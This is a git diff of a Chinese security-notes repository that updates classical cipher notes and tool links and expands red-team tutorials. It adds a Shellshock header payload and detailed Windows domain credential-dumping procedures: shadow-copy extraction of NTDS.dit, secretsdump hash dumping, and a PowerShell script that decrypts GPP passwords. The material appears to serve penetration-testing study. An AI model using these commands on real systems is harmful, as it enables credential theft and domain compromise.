-有几种密码和维吉尼亚密码相似,格罗斯费尔德密码(`Gronsfeld cipher`)实际上和维吉尼亚密码相同,除了使用了数字来代替字母以外没有什么区别.数字可以选择一种数列,如斐波那契数列,或者一些其他的伪随机序列.格罗斯费尔德密码密码分析过程和维吉尼亚密码大同小异,不过,自动密钥密码不能使用 卡西斯基算法 (kasiski)来破译,因为自动密钥密码的密钥不重复循环使用,破译自动密钥密码最好的方法的就是从密文不断尝试和猜测其中明文或密钥的一部分.
-
-![](../../../assets/img/安全/笔记/Crypto/格罗斯菲尔德密码.png)
-
-**在线工具**
-- https://planetcalc.com/2468/
-
----
-
### 自动密钥密码
自动密钥密码(`Autokey Cipher`)是多表替换密码,与维吉尼亚密码密切相关,但使用不同的方法生成密钥,通常来说要比维吉尼亚密码更安全.自动密钥密码主要有两种,关键词自动密钥密码和原文自动密钥密码
@@ -1212,7 +1074,7 @@ G = aabba | P = abbba | Y = babba
H = aabbb | Q = abbbb | Z = babbb
**在线工具**
-- http://rumkin.com/tools/cipher/baconian.php
+- [培根密码在线工具](../../Plan/Web-Tools.md#培根密码)
---
@@ -1483,39 +1345,92 @@ I have deposited in the county of Bedford...
---
+### 维吉尼亚密码
+
+维吉尼亚密码(`Vigenère Cipher`)是在单一恺撒密码的基础上扩展出多表代换密码,根据密钥(当密钥长度小于明文长度时可以循环使用)来决定用哪一行的密表来进行替换,以此来对抗字频统计
+
+![](../../../assets/img/安全/笔记/Crypto/维吉尼亚密码密表.png)
+
+**已知秘钥加密解密**
+
+> 明文: THE QUICK BROWN FOX JUMPS OVER THE LAZY DOG
+>
+>> 密钥(循环使用,密钥越长相对破解难度越大): CULTURE
+>
+>> 加密过程:如果第一行为明文字母,第一列为密钥字母,那么明文字母'T'列和密钥字母'C'行的交点就是密文字母'V',以此类推.
+>
+> 密文: VBP JOZGM VCHQE JQR UNGGW QPPK NYI NUKR XFK
+
+**未知秘钥破解**
+
+破解维吉尼亚密码第一步是确定密钥长度,在确定密钥长度后就可以尝试确定密钥,通常我们可以使用 卡方检验 来找到每个字母的偏移量
+
+/////[URL](http://www.practicalcryptography.com/cryptanalysis/stochastic-searching/cryptanalysis-vigenere-cipher/)/////
+
+**变种**
+
+有几种密码和维吉尼亚密码相似,格罗斯费尔德密码(`Gronsfeld cipher`)实际上和维吉尼亚密码相同,除了使用了数字来代替字母以外没有什么区别.数字可以选择一种数列,如斐波那契数列,或者一些其他的伪随机序列.格罗斯费尔德密码密码分析过程和维吉尼亚密码大同小异,不过,自动密钥密码不能使用 卡西斯基算法 (kasiski)来破译,因为自动密钥密码的密钥不重复循环使用,破译自动密钥密码最好的方法的就是从密文不断尝试和猜测其中明文或密钥的一部分.
+
+![](../../../assets/img/安全/笔记/Crypto/格罗斯菲尔德密码.png)
+
+**在线工具**
+- [维吉尼亚密码在线工具](../../Plan/Web-Tools.md#维吉尼亚密码)
+
+---
+
+### 猪圈密码
+
+猪圈密码(Pigpen Cipher或称九宫格密码、朱高密码、共济会密码或共济会员密码),是一种以格子为基础的简单替代式密码.
+
+![](../../../assets/img/安全/笔记/Crypto/猪圈密码.jpg)
+
+变种
+
+圣堂武士密码(Templar Cipher)是共济会的"猪圈密码"的一个变种,一直被共济会圣殿骑士用.
+
+![](../../../assets/img/安全/笔记/Crypto/templar_cipher.png)
+
+**OTHER CIPHER**
+
+![](../../../assets/img/安全/笔记/Crypto/othercipher1.png)
+![](../../../assets/img/安全/笔记/Crypto/othercipher2.png)
+![](../../../assets/img/安全/笔记/Crypto/othercipher3.png)
+![](../../../assets/img/安全/笔记/Crypto/othercipher4.png)
+
+**在线工具**
+- [猪圈密码在线工具](../../Plan/Web-Tools.md#猪圈密码)
+
+---
+
# 其他编码
## Brainfuck
-- http://esoteric.sange.fi/brainfuck/impl/interp/i.html
-- https://www.nayuki.io/page/brainfuck-interpreter-javascript
-- https://www.splitbrain.org/services/ook
+- [Brainfuck在线工具](../../Plan/Web-Tools.md#Brainfuck)
## JSfuck
-- http://discogscounter.getfreehosting.co.uk/js-noalnum.php
-- http://www.jsfuck.com/
+- [JSfuck在线工具](../../Plan/Web-Tools.md#JSfuck)
## JS加密/解密
-- http://tool.chinaz.com/tools/scriptencode.aspx
+- [JS加密/解密在线工具](../../Plan/Web-Tools.md#JS加密解密)
## 颜文字加密
-- https://cat-in-136.github.io/2010/12/aadecode-decode-encoded-as-aaencode.html
-- http://utf-8.jp/public/aaencode.html
+- [颜文字加密在线工具](../../Plan/Web-Tools.md#颜文字加密)
## 与佛论禅
-- http://www.keyfc.net/bbs/tools/tudoucode.aspx
+- [与佛论禅在线工具](../../Plan/Web-Tools.md#与佛论禅)
## 文本加密为汉字
-- http://www.qqxiuzi.cn/bianma/wenbenjiami.php
+- [文本加密为汉字在线工具](../../Plan/Web-Tools.md#文本加密为汉字)
## 随机密码生成
-- https://utils.chrisyue.com/password-generator/
+- [在线随机密码生成工具](../../Plan/Web-Tools.md#随机密码生成)
## 核心价值观加密
-- https://sym233.github.io/core-values-encoder/
+- [核心价值观加密在线工具](../../Plan/Web-Tools.md#核心价值观加密)
diff --git "a/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/Linux\346\270\227\351\200\217.md" "b/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/Linux\346\270\227\351\200\217.md"
index 257cf095..cb1bfc07 100644
--- "a/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/Linux\346\270\227\351\200\217.md"
+++ "b/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/Linux\346\270\227\351\200\217.md"
@@ -53,6 +53,8 @@
执行命令后,如果显示 Vulnerable CVE-2014-6271,证系统存在漏洞,可改变 echo Vulnerable CVE-2014-6271 为任意命令进行执行.
+ `User-Agent: () { :;}; whoami`
+
- MSF 模块
```bash
use exploit/linux/http/ipfire_bashbug_exec
diff --git "a/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/Web\345\270\270\350\247\201\346\274\217\346\264\236.md" "b/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/Web\345\270\270\350\247\201\346\274\217\346\264\236.md"
index 7f0ca131..c589eeab 100644
--- "a/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/Web\345\270\270\350\247\201\346\274\217\346\264\236.md"
+++ "b/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/Web\345\270\270\350\247\201\346\274\217\346\264\236.md"
@@ -187,6 +187,8 @@ IIS 6.0 解析利用方法有两种
- [网站安全狗IIS6.0解析webshell访问拦截bypass](https://shuimugan.com/bug/view?bug_no=128432)
- [桃源网络硬盘&IIS6.0解析漏洞](https://shuimugan.com/bug/view?bug_no=2632)
+---
+
## Nginx
**IIS 7.0/IIS 7.5/Nginx <8.03 畸形解析漏洞**
@@ -208,6 +210,8 @@ IIS 6.0 解析利用方法有两种
Nginx 在图片中嵌入 PHP 代码然后通过访问 `xxx.jpg%00.php` 来执行其中的代码
+---
+
## Apache
Apache 是从右到左开始判断解析,如果为不可识别解析,就再往左判断.
@@ -272,12 +276,16 @@ Apache 是从右到左开始判断解析,如果为不可识别解析,就再往
- [jerrychan807/WSPIH](https://github.com/jerrychan807/WSPIH) - 网站个人敏感信息文件扫描器
- [ring04h/weakfilescan](https://github.com/ring04h/weakfilescan) - 动态多线程敏感信息泄露检测工具
+---
+
## 目录遍历
**案例**
- [京东商城两处任意目录遍历下载漏洞](http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2016-0214222)
- [2 Path Traversal Cases](https://jlajara.gitlab.io/posts/2020/03/29/Path_Traversal.html)
+---
+
## GIT源码泄露
**简介**
@@ -293,6 +301,8 @@ Apache 是从右到左开始判断解析,如果为不可识别解析,就再往
- [lijiejie/GitHack](https://github.com/lijiejie/GitHack) - 一个 `.git` 泄露利用脚本,通过泄露的.git文件夹下的文件,重建还原工程源代码。
- [gakki429/Git_Extract](https://github.com/gakki429/Git_Extract) - 提取远程 git 泄露或本地 git 的工具
+---
+
## SVN源码泄露
- `/.svn/entries`
@@ -304,6 +314,8 @@ Apache 是从右到左开始判断解析,如果为不可识别解析,就再往
- [kost/dvcs-ripper](https://github.com/kost/dvcs-ripper) - SVN/GIT/HG 等版本控制系统的扫描工具
- [admintony/svnExploit](https://github.com/admintony/svnExploit) - 一款 SVN 源代码利用工具,其完美支持 SVN<1.7 版本和 SVN>1.7 版本的 SVN 源代码泄露
+---
+
## DS_Store文件泄漏
**简介**
@@ -321,6 +333,8 @@ Apache 是从右到左开始判断解析,如果为不可识别解析,就再往
- [lijiejie/ds_store_exp](https://github.com/lijiejie/ds_store_exp) - 一个 `.DS_Store` 文件泄漏利用脚本,它解析 `.DS_Store` 文件并递归地下载文件到本地。
- [anantshri/DS_Store_crawler_parser](https://github.com/anantshri/DS_Store_crawler_parser) - `.DS_Store` 文件解析脚本,递归地获取文件夹内的 `.ds_Store`
+---
+
## 网站备份压缩文件
**简介**
@@ -333,6 +347,8 @@ Apache 是从右到左开始判断解析,如果为不可识别解析,就再往
- [百度某分站备份文件泄露](http://www.anquan.us/static/bugs/wooyun-2014-050622.html)
- [乐友商城 24GB 代码与数据库敏感文件泄露](http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0124051)
+---
+
## WEB-INF/web.xml信息泄露
**简介**
@@ -352,11 +368,15 @@ WEB-INF 主要包含一下文件或目录:
**案例**
- [华为官网 WEB-INF 目录配置文件导致信息泄露](http://www.anquan.us/static/bugs/wooyun-2013-022906.html)
+---
+
## idea文件夹泄露
**工具**
- [lijiejie/idea_exploit](https://github.com/lijiejie/idea_exploit) - 一个 `.idea` 文件泄漏利用脚本
+---
+
## phpinfo信息泄露
**文章**
@@ -368,6 +388,8 @@ WEB-INF 主要包含一下文件或目录:
**工具**
- [proudwind/phpinfo_scanner](https://github.com/proudwind/phpinfo_scanner) - 抓取 phpinfo 重要信息 - 我这里运行报错,解决方法是把15行的3个 nth-child 改为 nth-of-type
+---
+
## jsonp信息泄露
**文章**
@@ -386,11 +408,15 @@ WEB-INF 主要包含一下文件或目录:
- [新浪微博 JSONP 劫持之点我链接开始微博蠕虫+刷粉丝](https://shuimugan.com/bug/view?bug_no=171499)
- [fanwe O2O 用户密码可劫持 (通用/开源软件 jsonp 劫持案例) ](https://shuimugan.com/bug/view?bug_no=124949)
+---
+
## JS敏感信息泄露
**文章**
- [JS 敏感信息泄露:不容忽视的 WEB 漏洞](https://www.secpulse.com/archives/35877.html)
+---
+
## 各类APIkey泄露
**文章**
diff --git "a/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/Windows\346\270\227\351\200\217.md" "b/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/Windows\346\270\227\351\200\217.md"
index d528bb1d..7544fa6b 100644
--- "a/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/Windows\346\270\227\351\200\217.md"
+++ "b/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/Windows\346\270\227\351\200\217.md"
@@ -14,17 +14,24 @@
* [多开](#多开)
* [连接记录](#连接记录)
-* **[Hash](#hash)**
+* **[认证](#认证)**
* [本地](#本地)
* [域](#域)
- * [NTDS.DIT](ntdsdit)
- * [PTHPTKPTT](#pthptkptt)
- * [PTH](#pth)
- * [PTT](#ptt)
+ * [NTDS.DIT](#ntdsdit)
+ * [利用Dcsync获取域用户Hash](#利用dcsync获取域用户hash)
+ * [使用VSS卷影副本提取ntds.dit](#使用vss卷影副本提取ntdsdit)
+ * [NTDS转储](#ntds转储)
+ * [GPP](#gpp)
+ * [PTH](#pth)
+ * [PTT](#ptt)
+ * [Silver_Tickets](#silver_tickets)
+ * [Golden_Tickets](#golden_tickets)
+ * [PTK](#ptk)
* [Kerberoast](#kerberoast)
* [Kerberoasting](#kerberoasting)
* [委派](#委派)
* [查找域中委派主机或账户](#查找域中委派主机或账户)
+ * [毒化LLMNR和NBT-NS请求](#毒化llmnr和nbt-ns请求)
* **[漏洞利用](#漏洞利用)**
* [权限提升](#提权)
@@ -36,12 +43,14 @@
# RDP
**查看 3389 端口是否开启**
-
-`REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /*如果是0x0则开启`
+```
+REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /*如果是0x0则开启
+```
**查看远程连接的端口**
-
-`REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber`
+```
+REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
+```
**cmd 开 RDP**
- 文章
@@ -55,7 +64,9 @@
- **WMIC 开启 3389**
- `wmic /namespace:\\root\CIMV2\TerminalServices PATH Win32_TerminalServiceSetting WHERE (__CLASS !="") CALL SetAllowTSConnections 1`
+ ```
+ wmic /namespace:\\root\CIMV2\TerminalServices PATH Win32_TerminalServiceSetting WHERE (__CLASS !="") CALL SetAllowTSConnections 1
+ ```
- **PowerShell 开启 RDP**
1. Enable RDP : `set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0`
@@ -90,7 +101,9 @@
- **查看 3389 端口是否更改**
- `REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /*出来的结果是 16 进制`
+ ```
+ REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /*出来的结果是 16 进制
+ ```
- **允许3389端口**
```
@@ -99,10 +112,13 @@
- **取消 xp&2003 系统防火墙对终端服务的限制及 IP 连接的限制:**
- `REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled :@ xpsp2res.dll,-22009 /f`
+ ```
+ REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled :@ xpsp2res.dll,-22009 /f
+ ```
**第三方连接工具**
- [rdesktop/rdesktop](https://github.com/rdesktop/rdesktop)
+ - kali 自带,使用方法 : `rdesktop `
- [Remmina](https://remmina.org/)
- [FreeRDP/FreeRDP](https://github.com/FreeRDP/FreeRDP)
@@ -110,12 +126,12 @@
## 多开
-**文章**
+**相关文章**
- [Win7 双开 3389](https://blog.csdn.net/SysProgram/article/details/11810889)
- [渗透技巧——Windows 系统远程桌面的多用户登录](https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E7%B3%BB%E7%BB%9F%E8%BF%9C%E7%A8%8B%E6%A1%8C%E9%9D%A2%E7%9A%84%E5%A4%9A%E7%94%A8%E6%88%B7%E7%99%BB%E5%BD%95/)
- [Multi-User login in Windows 7/Vista/XP using Remote Desktop](http://zahirkhan.com/tools-utilities/multi-user-login-in-windows-7)
-**工具**
+**相关工具**
- [stascorp/rdpwrap](https://github.com/stascorp/rdpwrap)
- mimikatz
@@ -136,25 +152,23 @@
## 连接记录
-**文章**
+**相关文章**
- [渗透技巧——获得 Windows 系统的远程桌面连接历史记录](https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E8%8E%B7%E5%BE%97Windows%E7%B3%BB%E7%BB%9F%E7%9A%84%E8%BF%9C%E7%A8%8B%E6%A1%8C%E9%9D%A2%E8%BF%9E%E6%8E%A5%E5%8E%86%E5%8F%B2%E8%AE%B0%E5%BD%95/)
- [关于 windows 的 RDP 连接记录](http://rcoil.me/2018/05/%E5%85%B3%E4%BA%8Ewindows%E7%9A%84RDP%E8%BF%9E%E6%8E%A5%E8%AE%B0%E5%BD%95/)
- [How to Clear RDP Connections History in Windows](http://woshub.com/how-to-clear-rdp-connections-history/#h2_3)
-**工具**
+**相关工具**
- [3gstudent/List-RDP-Connections-History](https://github.com/3gstudent/List-RDP-Connections-History)
---
-# Hash
-
-**笔记**
+# 认证
关于 windows 认证的基本知识点可见笔记 [认证](../../../运维/windows/笔记/认证.md)
## 本地
-**文章**
+**相关文章**
- [几种windows本地hash值获取和破解详解](https://www.secpulse.com/archives/65256.html)
- [Windows密码抓取总结](https://times0ng.github.io/2018/04/20/Windows%E5%AF%86%E7%A0%81%E6%8A%93%E5%8F%96%E6%80%BB%E7%BB%93/)
- [深刻理解windows安全认证机制](https://klionsec.github.io/2016/08/10/ntlm-kerberos/)
@@ -162,7 +176,7 @@
- [Windows下的密码hash——NTLM hash和Net-NTLM hash介绍](https://3gstudent.github.io/3gstudent.github.io/Windows%E4%B8%8B%E7%9A%84%E5%AF%86%E7%A0%81hash-NTLM-hash%E5%92%8CNet-NTLM-hash%E4%BB%8B%E7%BB%8D/)
- [浅学Windows认证](https://b404.xyz/2019/07/23/Study-Windows-Authentication/)
-**工具**
+**相关工具**
- [mimikatz](https://github.com/gentilkiwi/mimikatz) - 抓密码神器
- [mimikatz](../../工具/mimikatz.md)
- [skelsec/pypykatz](https://github.com/skelsec/pypykatz) - 用纯 Python 实现的 Mimikatz
@@ -179,83 +193,483 @@
## 域
-域部分内容来自 [[浅学Windows认证](https://b404.xyz/2019/07/23/Study-Windows-Authentication/)]
+**相关文章**
+- [横向渗透-域渗透 PTT、PTH、PTK](http://1984-0day.com/2020/04/05/%E6%A8%AA%E5%90%91%E6%B8%97%E9%80%8F-%E5%9F%9F%E6%B8%97%E9%80%8F-PTT%E3%80%81PTH%E3%80%81PTK/)
+- [我所了解的内网渗透——内网渗透知识大总结](https://www.anquanke.com/post/id/92646#h2-10)
### NTDS.DIT
-**文章**
+在域内 HASH 是存在 NTDS.DIT 中的, NTDS.DIT 是一个二进制文件,就等同于本地计算机的 SAM 文件,它的存放位置是 `%SystemRoot%\ntds\NTDS.DIT` 。这里面包含的不只是 Username 和 HASH,还有 OU、Group 等信息。
+
+AD 数据库是 Jet 数据库引擎,它使用提供数据存储和索引服务的可扩展存储引擎(ESE)ESE 级索引使对象属性可以快速定位。
+
+ntds.dit 文件由三个主表组成:数据表,链接表和SD表。
+
+**相关文章**
- [从NTDS.dit获取密码hash的三种方法](https://www.freebuf.com/sectool/176876.html)
- [导出域密码哈希值的多种方法介绍](https://www.freebuf.com/articles/system/177764.html)
+- [How Attackers Dump Active Directory Database Credentials](https://adsecurity.org/?p=2398)
+
+#### 利用Dcsync获取域用户Hash
+
+**mimikatz**
+
+mimikatz 的 NTDS.DIT 攻击操作见 [mimikatz 笔记](../../工具/mimikatz.md#ntdsdit)
+
+#### 使用VSS卷影副本提取ntds.dit
+
+卷影副本,也称为快照,是存储在 Data Protection Manager (DPM) 服务器上的副本的时间点副本。副本是文件服务器上单个卷的受保护共享、文件夹和文件的完整时间点副本。
+
+**WMIC**
+```
+wmic /node:AD /user:PENTESTAdministrator /password:123qweQWE!@# process call create "cmd /c vssadmin create shadow /for=c: 2>&1 > c:vss.log"
+
+wmic /node:AD /user:PENTESTadministrator /password:123qwe!@#!@# process call create "cmd /c copy 卷影IDWindowsNTDSNTDS.dit C:windowstempNTDS.dit 2>&1"
+
+wmic /node:AD /user:PENTESTadministrator /password:123qwe!@# process call create "cmd /c copy 卷影IDWindowsSystem32configSYSTEM c:windowstempSYSTEM.hive 2>&1"
+
+net use k: \pentest.comc$
+```
+
+**metasploit**
+```bash
+auxiliary/admin/smb/psexec_ntdsgrab
+windows/gather/credentials/domain_hashdump
+hashdump
+```
+
+**NTDSUtil**
+
+Ntdsutil.exe 是一个为 Active Directory 提供管理设施的命令行工具。
+
+使用 NTDSUTIL 的 IFM 创建(VSS 卷影副本)在 DC 上本地引用 ntds.dit
+
+NTDSUtil 是本地处理 AD DB 的命令实用程序(ntds.dit),并为 DCPromo 启用 IFM 集创建。IFM 与 DCPromo 一起用于“从媒体安装”,因此被升级的服务器不需要通过网络从另一个 DC 复制域数据。
+```
+ntdsutil "ac i ntds" "ifm" "create full c:temp" q q
+```
+当创建一个 IFM 时,VSS 快照被拍摄,挂载,ntds.dit 文件和相关数据被复制到目标文件夹中。
+
+**Nishang**
+```
+Import-Module .\Copy-VSS.ps1
+Copy-VSS
+Copy-VSS -DestinationDir C:\ShadowCopy\
+```
+
+**PowerSploit**
+```
+Import-Module .\VolumeShadowCopyTools.ps1
+New-VolumeShadowCopy -Volume C:\
+Get-VolumeShadowCopy
+```
+
+**DiskShadow**
+
+DiskShadow是一个 Microsoft 签名二进制文件,用于协助管理员执行与卷影复制服务(VSS)相关的操作。这个二进制文件有两个模式 interactive 和 script ,脚本将包含自动执行 NTDS.DIT 提取过程所需的所有命令。我们可以在脚本文件中添加以下行,以创建新的 volume shadow copy(卷影复制),挂载新驱动,执行复制命令以及删除 volume shadow copy。
+```
+set context persistent nowriters
+add volume c: alias someAlias
+create
+expose %someAlias% z:
+exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit
+delete shadows volume %someAlias%
+reset
+```
+
+需要注意的是,DiskShadow 二进制文件需要从 C:\Windows\System32 路径执行。如果从其它路径调用它,脚本将无法正确执行。
+```
+diskshadow.exe /s c:\diskshadow.txt
+```
+
+直接从解释器运行以下命令,将列出系统的所有可用 volume shadow copy。
+```
+diskshadow
+LIST SHADOWS ALL
+```
+
+SYSTEM 注册表 hive 也应该被复制,因为其包含了解密 NTDS 文件内容所需的密钥。
+```
+reg.exe save hklm\system c:\exfil\system.bak
+```
+
+**ntdsutil**
+```
+ntdsutil
+activate instance ntds
+ifm
+create full C:\ntdsutil
+quit
+quit
+```
+它将为我们生成两个新文件夹:Active Directory 和 Registry。NTDS.DIT 文件将被保存到 Active Directory 中,而 SAM 和 SYSTEM 文件则将被保存到 Registry 文件夹中。
+
+**vssadmin**
+
+volume shadow copy 是一个 Windows 命令行实用程序,管理员可以使用它备份计算机,卷以及文件(即使操作系统正在使用这些资源)。Volume Shadow Copy 作为一个服务运行,并要求文件系统的格式为 NTFS(默认情况下 windows 操作系统文件格式均为 NTFS)。从Windows 命令提示符执行以下命令,将会创建一个 C 盘的快照,这样我们就可以将其复制到另一个位置(如本地文件夹,网络文件夹或可移动介质)以获取它的访问权限。
+```
+vssadmin create shadow /for=C:
+```
+由于我们已经将 C 盘中的所有文件都复制到了另一个位置(HarddiskVolumeShadowCopy1),因此它们不会被操作系统直接使用,我们可以随意访问并复制其中的文件。使用 copy 命令将 NTDS.DIT 和 SYSTEM 文件,复制到本地名为 ShadowCopy 的驱动中的新建文件夹中。
+```
+copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy
+copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy
+```
+
+#### NTDS转储
+
+**Impacket-secretsdump**
+
+- https://www.coresecurity.com/corelabs-research/open-source-tools/impacket
+
+Impacket 是一组 python 脚本,可用于执行各种任务,包括提取 NTDS 文件的内容。impacket-secretsdump 模块需要我们提供 SYSTEM 和 NTDS 数据库文件。
+```
+impacket-secretsdump -system /root/SYSTEM -ntds /root/ntds.dit LOCAL
-### PTH/PTK/PTT
+-system:表示系统 hive 文件的路径(SYSTEM)
+-ntds:表示 dit 文件的路径(ntds.dit)
+```
+
+此外,impacket 可以通过使用计算机帐户及其哈希进行身份验证从 NTDS.DIT 文件远程转储域密码哈希。
+```
+impacket-secretsdump -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1
+```
-#### PTH
+**DSInternals PowerShell**
+
+- 工具地址 : [MichaelGrafnetter/DSInternals](https://github.com/MichaelGrafnetter/DSInternals)
+
+DSInternals PowerShell 模块提供了构建在框架之上的易于使用的 cmdlet。主要功能包括离线 ntds.dit 文件操作以及通过目录复制服务(DRS)远程协议查询域控制器。
+```
+Save-Module DSInternals -Path C:\Windows\System32\WindowsPowershell\v1.0\Modules
+Install-Module DSInternals
+Import-Module DSInternals
+Get-Bootkey -SystemHivePath 'C:\Users\sanje\Desktop\NTDS\SYSTEM'
+Get-ADDBAccount -All -DBPath 'C:\Users\sanje\Desktop\NTDS\ntds.dit' -Bootkey $key
+```
+
+**Ntdsxtract**
+
+- 工具地址 : [libyal/libesedb](https://github.com/libyal/libesedb/)
+- 相关文章 : [Extracting Hashes and Domain Info From ntds.dit](https://blog.ropnop.com/extracting-hashes-and-domain-info-from-ntds-dit/)
+
+首先我们需要从 NTDS.dit 文件中提取表格,这里我们可以通过 libesedb-tools 中的 esedbexport 来帮我们完成。Libesedb 是一个用于访问可扩展存储引擎(ESE)数据库文件(EDB)格式的库。当前,ESE 数据库格式被应用于许多不同的应用程序上,如 Windows Search,Windows Mail,Exchange,Active Directory(NTDS.dit)等。
+
+安装
+```
+get https://github.com/libyal/libesedb/releases/download/20200418/libesedb-experimental-20200418.tar.gz
+tar xf libesedb-experimental-20200418.tar.gz
+cd libesedb-20200418
+apt-get install autoconf automake autopoint libtool pkg-config
+./configure
+make
+make install
+ldconfig
+```
+
+利用该工具从 ntds.dit 文件中转储表格
+```
+esedbexport -m tables /root/Desktop/NTDS/ntds.dit
+```
+
+下载 ntdsxtract 提取用户信息和密码哈希值
+```
+git clone https://github.com/csababarta/ntdsxtract.git
+cd ntdsxtract
+python setup.py build && python setup.py install
+
+dsusers.py ntds.dit.export/datatable.4 ntds.dit.export/link_table.6 data --syshive /root/Desktop/NTDS/SYSTEM --passwordhashes --pwdformat john --ntoutfile nthash.txt --lmoutfile lmhash.txt
+```
+
+---
+
+### GPP
+
+关于 windows 组策略的基本知识点可见笔记 [组策略](../../../运维/windows/笔记/组策略.md)
+
+在 GPP 出现之前,很多统一管理的操作只能通过脚本来实现,而 GPP 方便和简化了这样的管理,GPP 你可以将其理解为一个功能点,作用是简单化、规范化组策略的发布和使用。
+
+注 : GPP漏洞只在2008没打补丁版本上存在,超过2008版本的系统是没办法写入密码的。
+
+域管理员在使用组策略批量管理域内主机时,如果配置组策略的过程中需要填入密码,那么该密码会被保存到共享文件夹 \SYSVOL 下,默认所有域内用户可访问,虽然被加密,但很容易被解密,访问 XML 文件,利用 AES 私钥可以解密 GPP 密码。
+
+在2012年前的某些点外,微软在 MSDN 上发布了 AES 的私钥,它可以用来解密这种密码。因为认证用户(所有域用户或者信任域里的用户)对 SYSVOL 拥有读权限。在域里的任何用户可以搜索 SYSVOL 共享中的带有 cpassword 字样的 XML 文件,里面包含了 AES 加密的密码。
+
+![](../../../../assets/img/安全/笔记/RedTeam/Windows渗透/2.png)
+
+- 微软在 MSDN 上发布的 AES 加密密钥(共享密钥) : https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-gppref/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be?redirectedfrom=MSDN
+
+使用 PowerShell 脚本解密 : https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1
+
+参考 https://xz.aliyun.com/t/1653 ,可简化 powershell 脚本如下,替换其中 GPP 密码即可
+```powershell
+function Get-DecryptedCpassword {
+ [CmdletBinding()]
+ Param (
+ [string] $Cpassword
+ )
+
+ try {
+ #Append appropriate padding based on string length
+ $Mod = ($Cpassword.length % 4)
+
+ switch ($Mod) {
+ '1' {$Cpassword = $Cpassword.Substring(0,$Cpassword.Length -1)}
+ '2' {$Cpassword += ('=' * (4 - $Mod))}
+ '3' {$Cpassword += ('=' * (4 - $Mod))}
+ }
+
+ $Base64Decoded = [Convert]::FromBase64String($Cpassword)
+
+ #Create a new AES .NET Crypto Object
+ $AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider
+ [Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
+ 0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)
+
+ #Set IV to all nulls to prevent dynamic generation of IV value
+ $AesIV = New-Object Byte[]($AesObject.IV.Length)
+ $AesObject.IV = $AesIV
+ $AesObject.Key = $AesKey
+ $DecryptorObject = $AesObject.CreateDecryptor()
+ [Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length)
+
+ return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)
+ }
+
+ catch {Write-Error $Error[0]}
+}
+Get-DecryptedCpassword "9XLcz+Caj/kyldECku6lQ1QJX3fe9gnshWkkWlgAN1U"
+```
+
+**组策略中该目录下的其他 XML 文件**
+- \User\Preferences\Groups
+- Services\Services.xml
+- ScheduledTasks\ScheduledTasks.xml
+- Printers\Printers.xml
+- Drives\Drives.xml
+- DataSources\DataSources.xml
+
+**相关文章**
+- [域安全篇:寻找SYSVOL里的密码和攻击GPP(组策略偏好)](https://www.freebuf.com/vuls/92016.html)
+- [Finding Passwords in SYSVOL & Exploiting Group Policy Preferences](https://adsecurity.org/?p=2288)
+- [域渗透——利用SYSVOL还原组策略中保存的密码](https://xz.aliyun.com/t/1653)
+- [windows2008 GPP漏洞利用](https://bl4ck.in/penetration/2015/08/14/windows2008-GPP%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8.html)
+- [浅析域渗透中的组策略利用](https://xz.aliyun.com/t/7784)
+
+**修复方案**
